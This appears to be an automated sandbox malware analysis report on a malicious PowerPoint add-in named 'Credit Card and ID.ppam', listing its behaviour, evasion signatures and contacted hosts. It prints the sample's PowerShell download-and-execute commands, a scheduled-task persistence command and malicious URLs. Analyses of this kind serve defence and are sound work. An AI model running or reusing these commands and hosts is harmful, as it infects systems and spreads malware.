Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

barindex
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\mshta.exe TID: 2980 Thread sleep time: -60000s >= -30000s Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe TID: 2992 Thread sleep time: -180000s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2552 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\System32\taskeng.exe TID: 2844 Thread sleep time: -60000s >= -30000s Jump to behavior
Source: C:\Windows\System32\mshta.exe TID: 2412 Thread sleep time: -780000s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1240 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\System32\mshta.exe TID: 1176 Thread sleep time: -480000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2044 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\mshta.exe TID: 1284 Thread sleep time: -420000s >= -30000s
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini Jump to behavior
Source: powershell.exe, 0000000B.00000002.453616182.0000000000362000.00000004.00000020.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]

Anti Debugging:

barindex
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\mshta.exe Memory protected: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
Bypasses PowerShell execution policy
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command i'E'x(iwr('https://8db3b91a-ea93-419b-b51b-0a69902759c5.usrfiles.com/ugd/8db3b9_8935e3fc07ab4d79aadce07d7856d8a3.txt?dn=kofkefjikdaowkdoaw') -useB);i'E'x(iwr('https://8db3b91a-ea93-419b-b51b-0a69902759c5.usrfiles.com/ugd/8db3b9_408b52dd81ad428db256ba35835b2ee7.txt?dn=asdoawkdajicqujwdi') -useB);
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command i'E'x(iwr('https://8db3b91a-ea93-419b-b51b-0a69902759c5.usrfiles.com/ugd/8db3b9_8935e3fc07ab4d79aadce07d7856d8a3.txt?dn=kofkefjikdaowkdoaw') -useB);i'E'x(iwr('https://8db3b91a-ea93-419b-b51b-0a69902759c5.usrfiles.com/ugd/8db3b9_408b52dd81ad428db256ba35835b2ee7.txt?dn=asdoawkdajicqujwdi') -useB);
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command i'E'x(iwr('https://8db3b91a-ea93-419b-b51b-0a69902759c5.usrfiles.com/ugd/8db3b9_8935e3fc07ab4d79aadce07d7856d8a3.txt?dn=kofkefjikdaowkdoaw') -useB);i'E'x(iwr('https://8db3b91a-ea93-419b-b51b-0a6990275
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command i'E'x(iwr('https://8db3b91a-ea93-419b-b51b-0a69902759c5.usrfiles.com/ugd/8db3b9_8935e3fc07ab4d79aadce07d7856d8a3.txt?dn=kofkefjikdaowkdoaw') -useB);i'E'x(iwr('https://8db3b91a-ea93-419b-b51b-0a6990275
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command i'E'x(iwr('https://8db3b91a-ea93-419b-b51b-0a69902759c5.usrfiles.com/ugd/8db3b9_8935e3fc07ab4d79aadce07d7856d8a3.txt?dn=kofkefjikdaowkdoaw') -useB);i'E'x(iwr('https://8db3b91a-ea93-419b-b51b-0a69902759c5.usrfiles.com/ugd/8db3b9_408b52dd81ad428db256ba35835b2ee7.txt?dn=asdoawkdajicqujwdi') -useB); Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE" "C:\Users\user\Desktop\Credit Card and ID.ppam Jump to behavior
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command i'E'x(iwr('https://8db3b91a-ea93-419b-b51b-0a69902759c5.usrfiles.com/ugd/8db3b9_8935e3fc07ab4d79aadce07d7856d8a3.txt?dn=kofkefjikdaowkdoaw') -useB);i'E'x(iwr('https://8db3b91a-ea93-419b-b51b-0a69902759c5.usrfiles.com/ugd/8db3b9_408b52dd81ad428db256ba35835b2ee7.txt?dn=asdoawkdajicqujwdi') -useB); Jump to behavior
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\schtasks.exe C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 63 /tn ""kqopaueyu"" /F /tr ""\""MsHtA""\""https://kukadunikkk@kdaoskdokaodkwldld.blogspot.com/p/30.html\" Jump to behavior
Source: C:\Windows\System32\taskeng.exe Process created: C:\Windows\System32\mshta.exe C:\Windows\system32\MsHtA.EXE "https://kukadunikkk@kdaoskdokaodkwldld.blogspot.com/p/30.html" Jump to behavior
Source: taskeng.exe, 0000000F.00000002.671893460.00000000007F0000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: taskeng.exe, 0000000F.00000002.671893460.00000000007F0000.00000002.00020000.sdmp Binary or memory string: !Progman
Source: taskeng.exe, 0000000F.00000002.671893460.00000000007F0000.00000002.00020000.sdmp Binary or memory string: Program Manager<

Language, Device and Operating System Detection:

barindex
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation Jump to behavior
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\hh.exe VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation Jump to behavior
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation Jump to behavior
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\hh.exe VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\hh.exe VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
Source: C:\Windows\System32\taskeng.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 528749 Sample: Credit Card and ID.ppam Startdate: 25/11/2021 Architecture: WINDOWS Score: 100 50 Antivirus detection for dropped file 2->50 52 Multi AV Scanner detection for submitted file 2->52 54 Sigma detected: Mshta Spawning Windows Shell 2->54 56 6 other signatures 2->56 8 cmd.exe 1 2->8         started        10 WmiPrvSE.exe 2 2->10         started        13 taskeng.exe 1 2->13         started        15 6 other processes 2->15 process3 dnsIp4 18 POWERPNT.EXE 8 15 8->18         started        66 Creates autostart registry keys with suspicious values (likely registry only malware) 10->66 68 Creates multiple autostart registry keys 10->68 70 Creates an autostart registry key pointing to binary in C:\Windows 10->70 20 mshta.exe 1 19 13->20         started        46 www.starinxxxgkular.duckdns.org 142.251.40.228, 49180, 49188, 80 GOOGLEUS United States 15->46 48 www.google.com 172.217.168.68, 49181, 49182, 80 GOOGLEUS United States 15->48 signatures5 process6 dnsIp7 24 mshta.exe 4 13 18->24         started        34 blogspot.l.googleusercontent.com 172.217.168.1, 443, 49170 GOOGLEUS United States 20->34 36 accounts.google.com 172.217.168.45, 443, 49176 GOOGLEUS United States 20->36 38 6 other IPs or domains 20->38 32 C:\Users\user\AppData\Local\...\30[1].htm, HTML 20->32 dropped file8 process9 dnsIp10 40 j.mp 67.199.248.16, 443, 49167 GOOGLE-PRIVATE-CLOUDUS United States 24->40 42 download1370.mediafire.com 205.196.123.58, 443, 49169 MEDIAFIREUS United States 24->42 44 www.mediafire.com 104.16.203.237, 443, 49168 CLOUDFLARENETUS United States 24->44 58 Bypasses PowerShell execution policy 24->58 60 Uses schtasks.exe or at.exe to add and modify task schedules 24->60 62 Creates processes via WMI 24->62 64 2 other signatures 24->64 28 powershell.exe 6 24->28         started        30 schtasks.exe 24->30         started        signatures11 process12
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
172.217.168.68
 www.google.com United States
15169 GOOGLEUS false
172.217.168.45
 accounts.google.com United States
15169 GOOGLEUS false
172.217.168.9
 blogger.l.google.com United States
15169 GOOGLEUS false
104.16.203.237
 www.mediafire.com United States
13335 CLOUDFLARENETUS false
205.196.123.58
 download1370.mediafire.com United States
46179 MEDIAFIREUS false
142.251.40.228
 www.starinxxxgkular.duckdns.org United States
15169 GOOGLEUS false
172.217.168.1
 blogspot.l.googleusercontent.com United States
15169 GOOGLEUS false
67.199.248.16
 j.mp United States
396982 GOOGLE-PRIVATE-CLOUDUS true

Contacted Domains

Name IP Active
www.starinxxxgkular.duckdns.org 142.251.40.228 true
www.mediafire.com 104.16.203.237 true
accounts.google.com 172.217.168.45 true
www-google-analytics.l.google.com 216.58.215.238 true
blogspot.l.googleusercontent.com 172.217.168.1 true
j.mp 67.199.248.16 true
www.google.com 172.217.168.68 true
blogger.l.google.com 172.217.168.9 true
download1370.mediafire.com 205.196.123.58 true
kdaoskdokaodkwldld.blogspot.com unknown unknown
www.blogger.com unknown unknown
resources.blogblog.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://www.blogger.com/static/v1/widgets/1397508952-widgets.js false
    		high
    https://j.mp/ODOASODOccomplermxjdajse false
    • Avira URL Cloud: safe
    		 unknown
    http://www.starinxxxgkular.duckdns.org/s1/30.txt false
    • Avira URL Cloud: safe
    		 unknown
    https://www.blogger.com/static/v1/jsbin/403901366-ieretrofit.js false
      		high
      https://www.mediafire.com/file/o7mbmqzedgahqhw/30.doc/file false
        		high
        https://accounts.google.com/ServiceLogin?passive=true&continue=https://www.blogger.com/blogin.g?blogspotURL%3Dhttps://kdaoskdokaodkwldld.blogspot.com/p/30.html%26type%3Dblog%26bpli%3D1&followup=https://www.blogger.com/blogin.g?blogspotURL%3Dhttps://kdaoskdokaodkwldld.blogspot.com/p/30.html%26type%3Dblog%26bpli%3D1&go=true false
          		high
          https://www.blogger.com/static/v1/widgets/1529571102-css_bundle_v2.css false
            		high
            https://kdaoskdokaodkwldld.blogspot.com/p/30.html false
              		high
              https://www.blogger.com/blogin.g?blogspotURL=https://kdaoskdokaodkwldld.blogspot.com/p/30.html&type=blog false
                		high